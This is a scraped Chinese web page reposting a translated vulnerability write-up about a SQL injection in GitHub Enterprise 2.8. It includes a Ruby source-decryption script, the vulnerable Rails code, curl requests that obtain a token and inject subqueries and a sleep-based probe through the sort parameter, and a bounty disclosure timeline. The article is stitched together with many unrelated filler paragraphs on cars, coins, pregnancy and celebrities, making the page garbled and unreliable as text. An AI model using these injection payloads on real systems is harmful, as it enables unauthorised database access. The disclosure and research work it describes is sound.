allcnewsBLOGNEWSBLOGASKBLOGBLOGZSK全部技术问答问答技术问答it问答代码软件新闻开发博客电脑/网络手机/数码笔记本电脑互联网操作系统软件硬件编程开发360产品资源分享电脑知识文档中心IT全部全部分类全部分类技术牛文全部分类教程最新网页制作cms教程平面设计媒体动画操作系统网站运营网络安全服务器教程数据库工具网络安全软件教学vbscript正则表达式javascript批处理更多»编程更新教程更新游戏更新allitnewsJava新闻网络医疗信息化安全创业站长电商科技访谈域名会议专栏创业动态融资创投创业学院 / 产品经理创业公司人物访谈营销开发数据库服务器系统虚拟化云计算嵌入式移动开发作业作业1常见软件all电脑网络手机数码生活游戏体育运动明星影音休闲爱好文化艺术社会民生教育科学医疗健康金融管理情感社交地区其他电脑互联网软件硬件编程开发360相关产品手机平板其他电子产品摄影器材360硬件通讯智能设备购物时尚生活常识美容塑身服装服饰出行旅游交通汽车购房置业家居装修美食烹饪单机电脑游戏网页游戏电视游戏桌游棋牌游戏手机游戏小游戏掌机游戏客户端游戏集体游戏其他游戏体育赛事篮球足球其他运动球类运动赛车健身运动运动用品影视娱乐人物音乐动漫摄影摄像收藏宠物幽默搞笑起名花鸟鱼虫茶艺彩票星座占卜书画美术舞蹈小说图书器乐声乐小品相声戏剧戏曲手工艺品历史话题时事政治就业职场军事国防节日风俗法律法规宗教礼仪礼节自然灾害360维权社会人物升学入学人文社科外语资格考试公务员留学出国家庭教育学习方法语文物理生物工程学农业数学化学健康知识心理健康孕育早教内科外科妇产科儿科皮肤科五官科男科整形中医药品传染科其他疾病医院两性肿瘤科创业投资企业管理财务税务银行股票金融理财基金债券保险贸易商务文书国民经济爱情婚姻家庭烦恼北京上海重庆天津黑龙江吉林辽宁河北内蒙古山西陕西宁夏甘肃青海新疆西藏四川贵州云南河南湖北湖南山东江苏浙江安徽江西福建广东广西海南香港澳门台湾海外地区

看我如何发现Github企业版程序SQL注入漏洞并获得5000美刀赏金

来源:CNBLOGS  责任编辑:小易  时间:2017/11/22 17:25:21


看我如何发现Github企业版程序SQL注入漏洞并获得5000美刀赏金

推荐1:本田飞度理由:外观时尚,内饰精致,发动机强悍,小排量大马力,油耗低,驾驶视野宽阔,驾乘空间宽敞,后备箱储物方便,作为居家车用,接送孩子、代步等很不错。推荐2:铃木雨燕理由:外形动感时尚,耐看,经得住考验,底盘做工扎实,操控性好,转弯及插队时穿梭灵活。1.5的动力输出,也算不错,空间一般,噪音一直还算可以。推荐3:嘉年华理由:动力很好,还有推背感,内饰设计前卫、漂亮。但舒适性相对前两者只能说是一般。最后祝你生活愉快边伯贤是整过容的,这是确定无疑的。偶像娱乐这行业,颜值不行是绝对无法混的,颜值高也不行,必须是超高,尤其是韩国偶像。在韩国工作的朋友,回国一块吃饭,她是做HR的,那天聊到她们公司招聘。我问了一句:你们都是怎么筛简历的啊她:“如果是社会招聘,就把本行业大公司背景的人留下,如果是校园招聘,就把好大学留下”。“那跟国内差不多,然后呢”“剩下就随意了,我们一般会把长相不错的留下,长得妖的,直接PASS掉”“所以颜值这东西,在韩国是认认真真的筛选并且考虑的吧”“是的,简历好的我们不会错过,长得顺眼确实有额外机会”。韩国经济近几年停滞不前,长相好可以加分,整容自然趋之如骛。我认为,颜值其实代表一个人的用心

  GitHub 企业版软件是专供公司团体用来部署在内网进行开发服务的商业性应用程序。Github 企业版采用标准 OVF 格式集成,以虚拟机(VM)镜像方式发布,可以在 enterprise.github.com 网站注册下载 45 天试用版本,并把其部署在任何虚拟机环境中。通过下载其试用版本软件进行分析,我花了一周时间,发现了其中存在的 SQL 注入漏洞,并获得了 5000 美元漏洞赏金。

这个问题其实有点标题党,因为张学友接受采访的视频如果你全部看了,他表达的其实不完全是这个意思。嗯,这句话应该才是他想传递的意思。《我是歌手》第五季改名为《歌手2017》是这一季节目的槽点之一,因为限韩令之后,一批购买的韩国版权的综艺都采取了这样的方法规避问题,《奔跑吧,兄弟》也是,说不定谁借鉴的谁呢。但是节目改名为《歌手》,也没改变这个节目越来越缺重量级选手的问题。因为华语乐坛能称得上唱将级的歌手。防恶意抓取,请查看原文,,真格学网提供内容。

  Github 企业版 VM 环境安装之后的效果如下:

错版币是指设计上或母版雕刻上的错误,印刷流程中的漏印不属于错版。货币因质量缺陷导致的“残次品”只能属于残次币而不属于错版币。目前世界上还无法定论什么样的才是真正的错版币,所以残次品也算错版币。收藏所遵。防恶意抓取,请查看原文,,真格学网提供内容。

91.png

02.png

  现在,Github 搭建完成,接下来就可以在虚拟机系统内进行深入分析。

泻药,黄金理财知识在这里给大家分析一下,袁大头究竟能卖多少钱?什么样的袁大头才更值钱。相信对袁大头有一定了解的人,都明白它的来源和价值,但是对于外行人来说,最关心的就是袁大头到底能值多少钱。很多网友在。防恶意抓取,请查看原文,,真格学网提供内容。

  环境安全性分析

在收藏界,有一条恒古不变的定律,那就是“物以稀为贵”。老版人民币作为今年兴起的热门收藏品类,自然也不例外。但并非所有旧版人民币都能卖个好价钱,关键看以下几个问题:第一、旧版人民币的制版年份。一般说来,。防恶意抓取,请查看原文,,真格学网提供内容。

  用 Nmap 发现有 6 个开启端口:

我国是一个重视教育的国家,因此,校舍越修越气派,设备越来越高级,孩子们的营养餐丰富多样,贫困生有读书补助,教室宽大明亮,可教师的工资还是照旧。    师享互联2015年看到新闻宣传调整教师工资,涨幅如。防恶意抓取,请查看原文,,真格学网提供内容。

$ nmap -sT -vv -p 1-65535 192.168.187.145 ... PORT STATE SERVICE 22/tcp open ssh 25/tcp closed smtp 80/tcp open http 122/tcp open smakynet 443/tcp open https 8080/tcp closed http-proxy 8443/tcp open https-alt 9418/tcp open git

养龟就要有个养龟的样子!我平时上街去公园都是两眼放光,看有什么石头适合给乌龟做晒台的。无论是巴西龟还是草龟,都需要有陆地面积,在水中放一块石头,让它们能上来休息、晒背。再来就是食物,新鲜的小鱼小虾是最好的,其次是蚯蚓、螺、蚌等,再次才是瘦肉,不到实在找不到食物的时候就不要喂肉。市场上卖的很便宜的那种袋装的龟粮绝对不要喂,里面几乎没什么营养,还含有大量激素,对龟生长很不利。最最关键的是水质,自来水必须要用太阳晒过2天再用。这样水里面的氯气几乎曝光了,就不会对乌龟眼睛造成刺激,减少了患白眼病的可能性。温度,夏秋两季好说,冬春两季,对于养龟新手来说会感到困惑。所以我建议,第一个冬天加温饲养,无论是小。防恶意抓取,请查看原文,,真格学网提供内容。

  这些端口用途初步分析为:

如今富豪们的坐骑都飞上天了,说豪宅堪比皇宫毫不爲过。在春晚屹立二十六年的赵本山,早已不是铁岭的那个农民,豪宅外景豪华相对不普通!2014年11月16日赵本山的女儿赵玉芳在铁岭出嫁。赵本山拿出高达300。防恶意抓取,请查看原文,,真格学网提供内容。

端口 22/tcp 和 9418/tcp 可能用于进程 haproxy 转发后端服务 babeld;

《天堂电影院》里有一句台词:如果你不出去走走,你就会以为这就是世界。澳大利亚有一个喜欢旅行的女孩儿EmilieRistevski,年仅24岁的她曾这样描述自己:照片的创造者,讲故事的人和流浪者。她一直。防恶意抓取,请查看原文,,真格学网提供内容。

端口 80/tcp 和 443/tcp 用于 Github 主要服务;

周末小孩上兴趣很显然是家长希望小孩有更多的才艺或者是培养他们,给他们以后的生活有更好的出路。现在的孩子和以前的孩子区别是非常大的,以前我们认真上学,玩也就是几个好朋友一起捉迷藏,办家家,丢沙包等等,可。防恶意抓取,请查看原文,,真格学网提供内容。

端口 122/tcp 用于 SSH 服务;

没有影响,这位孕妈可以放心,常规的超声检查对胎儿是不会产生不良影响的。B超也就是超声波诊断,是利用一种超出人的听觉范围的频率的声音,它可以穿透物体,如果碰到障碍,就会产生回声,而各种不相同的障碍物就会。防恶意抓取,请查看原文,,真格学网提供内容。

端口 8443/tcp 用于 GitHub 的管理控制台服务。

产后抑郁了怎么办?微脉来回答这个问题。1.产后郁闷≠产后抑郁产后郁闷也可称为“产后轻度抑郁”,有40%~70%的新手妈妈在生产之后会出现此症状,临床表现大多为烦燥、失眠、容易掉泪、焦虑、情绪起伏大等。。防恶意抓取,请查看原文,,真格学网提供内容。

  由于 GitHub 的管理控制台需要密码才能实现登录,所以你可以设置密码并通过 122 端口的 SSH 服务连接 VM 环境,SSH 连接进入系统之后,检查系统信息发现,几乎所有的 Github 服务代码都位于目录/data/下:

传统武术训练体系上是落后于自由搏击。在招式上可谓千变万化。武术是围绕着人身体的运动,那么运动生物化学、运动解剖学、体育心理学、运动生理学、运动生物力学、教育学、运动营养学等,这些是紧密和武术相关的课程。这恰恰是传统武术没有跟上时代的重要因素。传统武术如果仅是谈养生、健身,这绝对是世界一流的技术,我们的先人在漫漫五千年中积累的宝贵经验,有关养生的理论典籍和实用方法,非常多,在世界养生文化中占有重要地。防恶意抓取,请查看原文,,真格学网提供内容。

# ls -al /data/ total 92 drwxr-xr-x 23 root root 4096 Nov 29 12:54 . drwxr-xr-x 27 root root 4096 Dec 28 19:18 .. drwxr-xr-x 4 git git 4096 Nov 29 12:54 alambic drwxr-xr-x 4 babeld babeld 4096 Nov 29 12:53 babeld drwxr-xr-x 4 git git 4096 Nov 29 12:54 codeload drwxr-xr-x 2 root root 4096 Nov 29 12:54 db drwxr-xr-x 2 root root 4096 Nov 29 12:52 enterprise drwxr-xr-x 4 enterprise-manage enterprise-manage 4096 Nov 29 12:53 enterprise-manage drwxr-xr-x 4 git git 4096 Nov 29 12:54 failbotd drwxr-xr-x 3 root root 4096 Nov 29 12:54 git-hooks drwxr-xr-x 4 git git 4096 Nov 29 12:53 github drwxr-xr-x 4 git git 4096 Nov 29 12:54 git-import drwxr-xr-x 4 git git 4096 Nov 29 12:54 gitmon drwxr-xr-x 4 git git 4096 Nov 29 12:54 gpgverify drwxr-xr-x 4 git git 4096 Nov 29 12:54 hookshot drwxr-xr-x 4 root root 4096 Nov 29 12:54 lariat drwxr-xr-x 4 root root 4096 Nov 29 12:54 longpoll drwxr-xr-x 4 git git 4096 Nov 29 12:54 mail-replies drwxr-xr-x 4 git git 4096 Nov 29 12:54 pages drwxr-xr-x 4 root root 4096 Nov 29 12:54 pages-lua drwxr-xr-x 4 git git 4096 Nov 29 12:54 render lrwxrwxrwx 1 root root 23 Nov 29 12:52 repositories -> /data/user/repositories drwxr-xr-x 4 git git 4096 Nov 29 12:54 slumlord drwxr-xr-x 20 root root 4096 Dec 28 19:22 user

魅蓝E2评测:配置大升级性能表现如何?一、前言:解析魅蓝E系列定位经过2016年的疯狂扩张,魅族旗下的魅蓝产品线目前已经明晰,具体如下:其中1000元至2000元价位段,除了魅蓝X、Max系列去填补之外,另一位成员便是魅蓝E。魅蓝E是魅族在2016年8月10日推出的产品线,李楠在魅蓝E发布会上就曾明确指出,魅蓝E的目标人群是那些渴望品质,期待在低价之外更好一点的青年用户。由此看出,魅蓝E系列定位介于魅蓝X和魅蓝Note系列之间,主要面向中端市场,在品质和价格之间取得一个平衡点,同时填补魅族在这个价位段(1000元—1600元)的空白。搞清楚E系列的定位之后,我们再来说说今天的主角魅蓝E2。时隔。防恶意抓取,请查看原文,,真格学网提供内容。

  查看其中的文件源码,貌似是 base64 加密的:

比较多见的户型,几乎没什么能改的,都是承重墙。把厨房门封上,正对入户门,犯冲。把厨房向外扩,把餐厅扩进去,不然厨房小,餐厅别扭,厨房门冲客厅开,做玻璃门,透光比较好。原户型的飘窗,阳台建议把改,不然房。防恶意抓取,请查看原文,,真格学网提供内容。

03.png

  GitHub 使用了一个自定义的库来加密混淆自身源代码。如果你在谷歌搜索 ruby_concealer.so,你会发现一个牛人已经对这种加密方式作了分析,只需在 ruby_concealer.so 中用 rb_f_puts 替换 rb_f_eval 即可实现解密。但我们还是实际动手来看看,打开 IDA Pro 分析一下:

孩子的作文常常是从小学一二年级就开始的,开始时从看图写话等简单的开始,从写一句话开始,逐渐向写一段话过渡。到了三年级便正是开始作文的起步!对家长来说,到了孩子开始作文的年龄,建议给孩子以作文的启蒙。告诉孩子作文是什么,就是写出心中想到的话,真实的想法等等,不要加重孩子的畏难心理,帮助孩子度过作文早期训练的启蒙是最好的。。防恶意抓取,请查看原文,,真格学网提供内容。

04.png

05.png

  你可以发现,其源程序使用了类 Zlib::Inflate::inflate 进行数据解压缩,并使用了一段明文 KEY 作为异或(XOR)操作,然而,让人搞笑的是,这段明文 KEY 竟然是这样的:

82版《西游记》  在经典的82版《西游记》中,有一位没有名字的主演。不是扮演三太子的演员,而是取经路上,那匹驮了唐僧一路的白马。  为了找到合适的白马,导演花尽了心思。在海南岛拍摄时,把一匹棕色的大。防恶意抓取,请查看原文,,真格学网提供内容。

This obfuscation is intended to discourage GitHub Enterprise customers from making modifications to the VM. We know this 'encryption' is easily broken. (我们清楚该加密很容易被破解,但其目的在于防止 GitHub 企业版用户随意对 VM 环境进行修改)

鲁迅是说过郭沫若是“才子加流氓”。因为郭沫若有过三次婚姻。故事我有点记不得了,反正传说中郭沫若除了三个妻子,还有几个情人呢?又喜欢去妓院嫖娼。记得二儿子郭博曾在记者面前这样评价他的父亲郭沫若:“对于家庭,郭沫若是个罪人。”这一句真的让全社会都震惊了啊。鲁迅先生的话虽然有点刻薄,但是在这点上的确是说对了的。因为郭沫若这一生在感情上既有情人又是绝情人。鲁迅是我们都知道的文学家,郭沫若也是众所周知的诗人。防恶意抓取,请查看原文,,真格学网提供内容。

2017-01-10_113847.jpg

  哎呀,让人哭笑不得….

用电子书籍阅读器和大屏幕手机看书,有什么区别?电纸书阅读器采用墨水屏,纸质书感觉,清晰度较高,无频闪,对眼睛更好。电纸书也就是电子阅读器的简称。一般认为,电纸书特指使用E-ink显示技术,提供类似纸张。防恶意抓取,请查看原文,,真格学网提供内容。

  有了这些,我们就可以自己构造解密脚本了:

对于消费者来说,装修是一件极其费心费力的事情,不论采取怎样的装修方式,选择一个靠谱的装修公司才能真正的省心、放心。就像平时在某宝上看买家秀、在某饿上面看订单评论一样,选择装修公司时,用户最先想到的也就。防恶意抓取,请查看原文,,真格学网提供内容。

require 'zlib' key = "This obfuscation is intended to discourage GitHub Enterprise customers from making modifications to the VM. We know this 'encryption' is easily broken. " def decrypt (s) i, plaintext = 0, '' Zlib::Inflate.inflate (s) .each_byte do |c| plaintext << (c ^ key[i%key.length].ord) .chr i += 1 end plaintext end content = File.open (ARGV[0], "r") .read content.sub! %Q(require "ruby_concealer.so"\n__ruby_concealer__), " decrypt " plaintext = eval content puts plaintext

我儿子前几天就被吓了。我带我儿子回娘家,大前天晚上,我和我儿子在床上玩的很开心,突然他全身抖了一下,大哭的扑到我怀里。眼睛不敢看周围。我哄了好久,抱他躺在被窝里,他还是哭,说有老鼠。哄了好一会他抬头看了一下就钻到我怀里。我一直说老鼠被我打死了,把被子掀开我做了个打老鼠的动作,他也对着墙角一直做打老鼠的动作,我告诉他妈妈在,不怕。不过他一直说要回家,要出去,不在这里。哄了两个小时才停。不过一晚上他一直紧紧的抱着我。我上厕所都挂在我身上。其实我心里在想是不是脏东西进来了,我还以为我姐来逗他。第二天进房间睡觉,他又是同样的反应,一直吵着出去睡觉。我紧紧抱住说不怕不怕妈妈在,他一直缩在我怀里不敢抬头,。防恶意抓取,请查看原文,,真格学网提供内容。

  代码分析

自从怀孕后,孕妈便开始狂吐不止......孕吐并不是所有孕妈都会体验,但80%的孕妈都是躲不过的,而且会一直持续到孕中期才会缓解。不少人觉得孕吐反应大小和胎儿的性别有很大的关系,其实目前医学研究并没有。防恶意抓取,请查看原文,,真格学网提供内容。

  实现程序源代码解密之后,让我们尝试着进行代码审计:

快手这个软件也算火遍大江南北,但快手是怎么火的呢,没错,就是现在这些大网红捧火的,那这些大网红怎么火的,没错,就这些游客捧火的好有逻辑的关系链,请灌水各个网红的快手发展路线先说说社会我驴哥,大家应该不。防恶意抓取,请查看原文,,真格学网提供内容。

$ cloc /data/ 81267 text files. 47503 unique files. 24550 files ignored. http://cloc.sourceforge.net v 1.60 T=348.06 s (103.5 files/s, 15548.9 lines/s) ----------------------------------------------------------------------------------- Language files blank comment code ----------------------------------------------------------------------------------- Ruby 25854 359545 437125 1838503 Javascript 4351 109994 105296 881416 YAML 600 1349 3214 289039 Python 1108 44862 64025 180400 XML 121 6492 3223 125556 C 444 30903 23966 123938 Bourne Shell 852 14490 16417 87477 HTML 636 24760 2001 82526 C++ 184 8370 8890 79139 C/C++ Header 428 11679 22773 72226 Java 198 6665 14303 45187 CSS 458 4641 3092 44813 Bourne Again Shell 142 6196 9006 35106 m4 21 3259 369 29433 ...

我先说一下,网络与新媒体专业在百科里面说的是“网络与新媒体专业是基于互联网等新兴媒介形态对新闻传播行业及整个社会的的巨大推动,顺应数字信息时代发展所需,顺应移动互联媒介融合的趋势要求而产生的新闻传播类新专业。”而新闻学是“新闻学是一种包含搜集、撰写及报道新闻的学科。在广义上,它亦包含了编辑和演示新闻专题的过程。新闻学在报业、电视、电台以及网络新媒体等各种传播媒介上均起着重要的作用。”从诞生的时间来说,新媒体专业是近来新增的一个专业,而新闻学则是很老牌的一个专业,历史很悠久,两个都属于新闻与传播学院的,一般的新媒体专业叫“网络与新媒体”,是属于传播类的,但是也离不开新闻学的知识。简单地说,新闻学。防恶意抓取,请查看原文,,真格学网提供内容。

  -

这个价格是相当有诚意的,因为对东风雪铁龙而言,现在一个月才卖6000多台,到了生死存亡的关头,天逸再卖不好公司就没戏了,所以必须有一个震撼力的价格。法系车产品并不错,但由于各方面原因在中国市场表现并不。防恶意抓取,请查看原文,,真格学网提供内容。

$ ./bin/rake about About your application's environment Ruby version 2.1.7 (x86_64-linux) RubyGems version 2.2.5 Rack version 1.6.4 Rails version 3.2.22.4 JavaScript Runtime Node.js (V8) Active Record version 3.2.22.4 Action Pack version 3.2.22.4 Action Mailer version 3.2.22.4 Active Support version 3.2.22.4 Middleware GitHub::DefaultRoleMiddleware, Rack::Runtime, Rack::MethodOverride, ActionDispatch::RequestId, Rails::Rack::Logger, ActionDispatch::ShowExceptions, ActionDispatch::DebugExceptions, ActionDispatch::Callbacks, ActiveRecord::ConnectionAdapters::ConnectionManagement, ActionDispatch::Cookies, ActionDispatch::Session::CookieStore, ActionDispatch::Flash, ActionDispatch::ParamsParser, ActionDispatch::Head, Rack::ConditionalGet, Rack::ETag, ActionDispatch::BestStandardsSupport Application root /data/github/9fcdcc8 Environment production Database adapter githubmysql2 Database schema version 20161003225024

我家里是做烧烤的,我把家里的实际情况说一下,可以作为参考我家做烧烤这行有十几年了(具体多少年忘了),在一座广东四五线城市的小县城里。一开始是从路边摊做的,妈妈骑着一辆三轮车从家里骑到繁华的地段。刚开始一段时间基本天天亏本,利润还不够炭钱。估计那时我妈妈也天天烦恼,毕竟家里两兄弟,压力很大。那时家里住的房子又小又烂,40多平米的瓦片房,没有房间没有厕所,四个人就挤在这小小的家里。逢雨天,屋顶必漏水,老鼠成群结队在房子各处角落里爬着(ps:老爸在工厂里打着工,晚上和妈妈一起打理烧烤小档)这是份拿命来换钱的工作,大家都知道,一个经常呆在炭炉边的人,是每天都要吸入大量有害的油烟,而且眼睛也会被熏得难受。防恶意抓取,请查看原文,,真格学网提供内容。

  从以上分析可以看出大部分为 Ruby 代码,而且可以发现:

一个人长得好不好看,鼻子占了很大的因素鼻子几乎承包了一个人80%的颜值、90%的气质拥有高挺尖翘的鼻子让整个人看起来更出众!怎样才能拥有一个漂亮鼻子呢?答案很简单如果先天没有,那就后天来造然而,打造美。防恶意抓取,请查看原文,,真格学网提供内容。

程序通过端口 80 和 443 远程连接 github.com、gist.github.com 和 api.github.com 在目录/data/github/下更新代码库;

目录/data/render/可能为 render.githubusercontent.com 代码库;

程序通过 8443 端口运行目录/data/enterprise-manage/下服务。

  漏洞分析

  虽然我对 Ruby 不太熟悉,但经过现学现用,我花了一周的时间发现了这个漏洞,以下我的分析工作日程:

  第一天  设置 Github 虚拟机环境

  第二天  设置 Github 虚拟机环境

  第三天  学习 Rails 进行代码审计

  第四天  学习 Rails 进行代码审计

  第五天  学习 Rails 进行代码审计

  第六天  哦也,找到了一个 SQL 注入漏洞

  这个 SQL 注入漏洞存在于 GitHub 企业版程序的 PreReceiveHookTarget 模块中,其根本原因在于/data/github/current/app/model/pre_receive_hook_target.rb 文件的第 45 行:

33 scope :sorted_by, -> (order, direction = nil) { 34 direction = "DESC" == "#{direction}".upcase ? "DESC" : "ASC" 35 select(<<-SQL) 36 #{table_name}.*, 37 CASE hookable_type 38 WHEN 'global' THEN 0 39 WHEN 'User' THEN 1 40 WHEN 'Repository' THEN 2 41 END AS priority 42 SQL 43 .joins ("JOIN pre_receive_hooks hook ON hook_id = hook.id") 44 .readonly(false) 45 .order ([order, direction].join (" ")) 46 }

  虽然 Rails 中内置的对象关系映射 ActiveRecord in Rails 本身不允许 SQL 注入操作,但一些 ActiveRecord 的误用实例同样会引起 SQL 注入。具体可参考学习 Rails-sqli.org。在该漏洞情况中,我们可以控制 order 方法的参数实现恶意代码注入。跟踪观察发现,服务 sorted_by 被 data/github/current/app/api/org_pre_receive_hooks.rb 文件的第 61 行调用:

10 get "/organizations/:organization_id/pre-receive-hooks" do 11 control_access :list_org_pre_receive_hooks, :o rg => org = find_org! 12 @documentation_url << "#list-pre-receive-hooks" 13 targets = PreReceiveHookTarget.visible_for_hookable (org) 14 targets = sort (targets) .paginate (pagination) 15 GitHub::PrefillAssociations.for_pre_receive_hook_targets targets 16 deliver :pre_receive_org_target_hash, targets 17 end ... 60 def sort (scope) 61 scope.sorted_by ("hook.#{params[:sort] || "id"}", params[:direction] || "asc") 62 end

  可以清楚地看到 params[:sort]被传递给了 scope.sorted_by,所以我们可以尝试着向 params[:sort]注入恶意代码。

  在触发该漏洞之前,接入 API 需要 admin:pre_receive_hook 函数具备一个有效的 access_token 值,高兴的是,我们可以通过以下命令来获取:

$ curl -k -u 'nogg:nogg' 'https://192.168.187.145/api/v3/authorizations' \ -d '{"scopes":"admin:pre_receive_hook","note":"x"}' { "id": 4, "url": "https://192.168.187.145/api/v3/authorizations/4", "app": { "name": "x", "url": "https://developer.github.com/enterprise/2.8/v3/oauth_authorizations/", "client_id": "00000000000000000000" }, "token": "????????", "hashed_token": "1135d1310cbe67ae931ff7ed8a09d7497d4cc008ac730f2f7f7856dc5d6b39f4", "token_last_eight": "1fadac36", "note": "x", "note_url": null, "created_at": "2017-01-05T22:17:32Z", "updated_at": "2017-01-05T22:17:32Z", "scopes": [ "admin:pre_receive_hook" ], "fingerprint": null }

  一旦获取到有效的 access_token 值之后,漏洞就会被触发:

$ curl -k -H 'Accept:application/vnd.github.eye-scream-preview' \ 'https://192.168.187.145/api/v3/organizations/1/pre-receive-hooks?access_token=????????&sort=id,(select+1+from+information_schema.tables+limit+1,1)' [ ] $ curl -k -H 'Accept:application/vnd.github.eye-scream-preview' \ 'https://192.168.187.145/api/v3/organizations/1/pre-receive-hooks?access_token=????????&sort=id,(select+1+from+mysql.user+limit+1,1)' { "message": "Server Error", "documentation_url": "https://developer.github.com/enterprise/2.8/v3/orgs/pre_receive_hooks" } $ curl -k -H 'Accept:application/vnd.github.eye-scream-preview' \ 'https://192.168.187.145/api/v3/organizations/1/pre-receive-hooks?access_token=????????&sort=id,if (user ()="github@localhost",sleep (5),user ()) { ... }

06.png

  漏洞报送进程

  2016/12/26 05:48   通过 HackerOne 把该漏洞报送给 GitHub

  2016/12/26 08:39   GitHub 给出反馈,表示已通过验证并正在修复;

  2016/12/26 15:48   提供给 GitHub 更多漏洞细节;

  2016/12/28 02:44   GitHub 反馈表示,漏洞补丁将随 GitHub 企业版后续更新释出;

  2017/01/04 06:41   GitHub 回复将给我 5000 美刀赏金;

  2017/01/05 02:37   资询 GitHub,是否介意我将此漏洞公开在个人博客;

  2017/01/05 03:06   GitHub 很爽快地表示,没问题!

  2017/01/05 07:06   GitHub Enterprise 2.8.5 发布!

  如果你对该漏洞感兴趣,可以自己部署 Github 企业版系统环境进行深入分析。

  参考来源:orange,FB 小编 clouds 编译,转载请注明来自 FreeBuf.COM。

说“《黄帝内经》没一句靠谱的,全是瞎忽悠”的人,如果要和他详细解释,估计他不爱听也听不懂,如同与一个学渣讨论高数问题一样荒谬绝伦。中西文化是两套相互不兼容的体系,这种不兼容性远超苹果和安卓。那些说《黄帝内经》不靠谙是瞎呼悠的人,如同极残果粉对安卓系统的贬斥一样,都是充满狭隘偏见的过激之辞。不是《黄帝内经》不靠谱,更不是瞎呼悠,对一个天然排斥中国文化的人来说,只要欧美人没有认可的东西,哪怕他亲爹亲娘说的都不管用。脑子是个好东西,但对感性的人来说,脑子显然还没有情绪重要。跟着感觉走,坑就在前头,掉下也无妨,痛也愿忍受。这个问题其实有点标题党,因为张学友接受采访的视频如果你全部看了,他表达的其实不完全是这个意思。嗯,这句话应该才是他想传递的意思。《我是歌手》第五季改名为《歌手2017》是这一季节目的槽点之一,因为限韩令之后,一批购买的韩国版权的综艺都采取了这样的方法规避问题,《奔跑吧,兄弟》也是,说不定谁借鉴的谁呢。但是节目改名为《歌手》,也没改变这个节目越来越缺重量级选手的问题。因为华语乐坛能称得上唱将级的歌手数量本来就有限,除了已经参加节目的这些,剩下的可选择歌手越来越少。而这些歌手里,大部分明明应该参加却一直没参加的,其实都跟张学友的情况相似。已经是天王天后级别的歌手了,有代表作,歌曲曾经影响过一代人,


  • 本文相关:
  • GitHub将警告开发者流行软件库的漏洞
  • 微软和GitHub合作将GVFS带到macOS和Linux
  • GitHub现可提醒项目依赖关系中的安全漏洞
  • GitHub宣布新版Atom文本编辑器支持“实时代码协作”
  • GitHub使用Spokes进行跨数据中心复制
  • GitHub发布年度开发者报告 JavaScript 依然最受欢迎
  • 免责声明 - 关于我们 - 联系我们 - 广告联系 - 友情链接 - 帮助中心 - 频道导航
    Copyright © 2017 www.zgxue.com All Rights Reserved